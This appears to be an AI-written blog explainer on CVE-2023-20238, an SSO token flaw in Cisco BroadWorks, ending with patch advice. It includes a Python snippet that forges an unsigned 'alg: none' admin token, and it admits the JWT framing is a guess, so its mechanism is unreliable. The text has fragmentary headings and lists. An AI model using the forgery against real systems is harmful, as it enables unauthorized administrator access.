CVE-2023-20238 - Breaking Down the Cisco BroadWorks SSO Token Flaw

---

Cisco’s BroadWorks Application Delivery Platform and BroadWorks Xtended Services Platform are widely used in the telecommunications industry. In 2023, a significant vulnerability was discovered—CVE-2023-20238—that puts BroadWorks deployments at risk from remote attackers who can gain unauthorized access by forging SSO tokens. Let’s dive into what this flaw is, how it can be exploited, and what you can do to protect your systems.

What is CVE-2023-20238?

CVE-2023-20238 is a vulnerability found in the Single Sign-On (SSO) authentication of Cisco BroadWorks. The issue lets an unauthenticated attacker on the network forge credentials and, by doing so, get access to the system. If the attacker succeeds, they can impersonate users—including administrators—with serious consequences like unauthorized command execution, toll fraud, data leaks, and more.

The problem stems from how BroadWorks validates SSO tokens. The check is weak, allowing attackers to generate a token without actually having the secret or possessing any real authentication.

BroadWorks Xtended Services Platform (XSP)

All versions that use the vulnerable SSO implementation are targets.

How Does the Exploit Work?

To exploit CVE-2023-20238, an attacker needs to know or guess a valid user ID for the system. Using this, they generate a fake SSO token. Because the validation of tokens is defective, the forged token is accepted as valid, and the attacker is logged in as that user—possibly an administrator.

The vulnerability centers on the fact that SSO tokens can be accepted without truly verifying their signature or integrity.

Example Exploit: Forging a Token

Imagine BroadWorks uses JWT (JSON Web Token)-like SSO tokens, signed with a secret. The authentication service should check the token’s signature carefully, but here it does not.

A simple code illustration

import base64
import json

def base64url_encode(data):
    return base64.urlsafe_b64encode(data).decode().replace('=', '')

# Creating fake token payload
payload = {
    "user": "admin",
    "role": "Administrator"
}
encoded_payload = base64url_encode(json.dumps(payload).encode())

# Faking the header
header = {
    "alg": "none",  # Vulnerable systems sometimes don't check this
    "typ": "JWT"
}
encoded_header = base64url_encode(json.dumps(header).encode())

# No signature included!
fake_token = f"{encoded_header}.{encoded_payload}."

print("Forged SSO Token:")
print(fake_token)

*In some vulnerable BroadWorks SSO validations, this token (with a blank signature) may be accepted—giving the attacker admin access!*

Escalate: Use admin access to add new users or accounts.

If the attacker impersonates an Admin, the risks are much higher—effectively, full takeover.

Cisco has released security advisories and fixes for affected versions. Here’s what you should do

1. Update BroadWorks: Patch your Application Delivery Platform or Xtended Services Platform immediately.

References & Further Reading

- Cisco Security Advisory - CVE-2023-20238
- NIST NVD - CVE-2023-20238
- How JWT alg:none Can Go Wrong (jwt.io blog)

Summary

CVE-2023-20238 shows how a broken SSO validation can make even large telecom systems vulnerable to simple tricks. If you use Cisco BroadWorks platforms, act now: patch, monitor, and audit your systems. This is not just a technical bug—it can lead to direct financial loss and privacy violations. Stay safe!


*Exclusive content by AI for cybersecurity readers.*

Timeline

Published on: 09/06/2023 18:15:00 UTC
Last modified on: 09/14/2023 15:39:00 UTC